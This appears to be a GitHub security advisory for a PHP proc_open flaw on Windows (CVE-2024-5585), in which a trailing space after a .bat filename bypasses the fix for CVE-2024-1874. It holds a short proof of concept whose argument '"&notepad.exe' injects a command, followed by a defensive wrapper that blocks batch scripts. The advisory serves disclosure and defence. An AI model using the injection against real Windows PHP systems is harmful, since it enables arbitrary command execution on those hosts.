
bypass CVE-2024-1874

High
smalyshev published GHSA-9fcc-425m-g385 Jun 9, 2024

Package

No package listed

Affected versions

8.3.6

Patched versions

8.1.29, 8.2.20, 8.3.8

Description

Summary

Same as CVE-2024-1874.

Due to the improper handling of command line arguments on Windows, maliciously crafted arguments can inject arbitrary commands even if the bypass_shell option is enabled.

Details

Add a space at the end of the filename; everything else is the same as CVE-2024-1874.

PoC

  1. Save the following file as test.bat

```bat
echo hello
```

  2. Save the following file as 1.php, notice the space at the end of argv-filename

```php
<?php
// Pass the child's stdin/stdout straight through; stderr goes to STDOUT.
$descriptorspec = [STDIN, STDOUT, STDOUT];
// "test.bat " ends with a space: this is the only change from CVE-2024-1874.
$proc = proc_open(["test.bat ", "\"&notepad.exe"], $descriptorspec, $pipes, null, null, array("bypass_shell" => true));
proc_close($proc);
```

  3. Run it with PHP and confirm that notepad.exe pops up.

Impact

Malicious command line arguments on the Windows platform.
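
A defensive wrapper for code that cannot yet move to a patched release, covering the trailing-space variant described above. This is an added example, not part of the advisory and not PHP's own fix; the helper names are hypothetical, and it assumes that Windows ignores trailing spaces and dots when resolving a file name and runs .bat/.cmd files through cmd.exe.

```php
<?php
// Added example: helper names are hypothetical; this is not PHP's own fix.

// Assumption: Windows ignores trailing spaces and dots when it resolves a
// file name, so "test.bat " still launches test.bat.
function normalized_program(string $program): string
{
    return rtrim($program, ' .');
}

// True when the normalized name is a batch script, which Windows runs
// through cmd.exe even when bypass_shell is set.
function is_batch_script(string $program): bool
{
    return preg_match('/\.(bat|cmd)$/i', normalized_program($program)) === 1;
}

// Wrapper around proc_open() that refuses batch scripts outright instead of
// trying to escape their arguments.
function guarded_proc_open(array $command, array $spec, &$pipes,
                           ?string $cwd = null, ?array $env = null)
{
    if (!is_string($command[0] ?? null)) {
        throw new InvalidArgumentException('command[0] must be a program name');
    }
    if (is_batch_script($command[0])) {
        throw new RuntimeException('refusing to run a batch script: '
            . var_export($command[0], true));
    }
    // Pass the normalized name on so the check and the launch agree.
    $command[0] = normalized_program($command[0]);
    return proc_open($command, $spec, $pipes, $cwd, $env, ['bypass_shell' => true]);
}

// Constructed sample program names, checked without spawning anything.
$samples = ['test.bat', 'test.bat ', 'TEST.CMD. ', 'C:\\tools\\report.exe'];
foreach ($samples as $name) {
    printf("%-24s %s\n", var_export($name, true),
        is_batch_script($name) ? 'blocked' : 'allowed');
}
```

The guard only narrows exposure for the case on this page; upgrading to one of the patched versions listed above remains the fix.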

Severity

High 7.7 / 10

CVSS base metrics

Attack vector: Network
Attack complexity: High
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: Low

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L

CVE ID

CVE-2024-5585
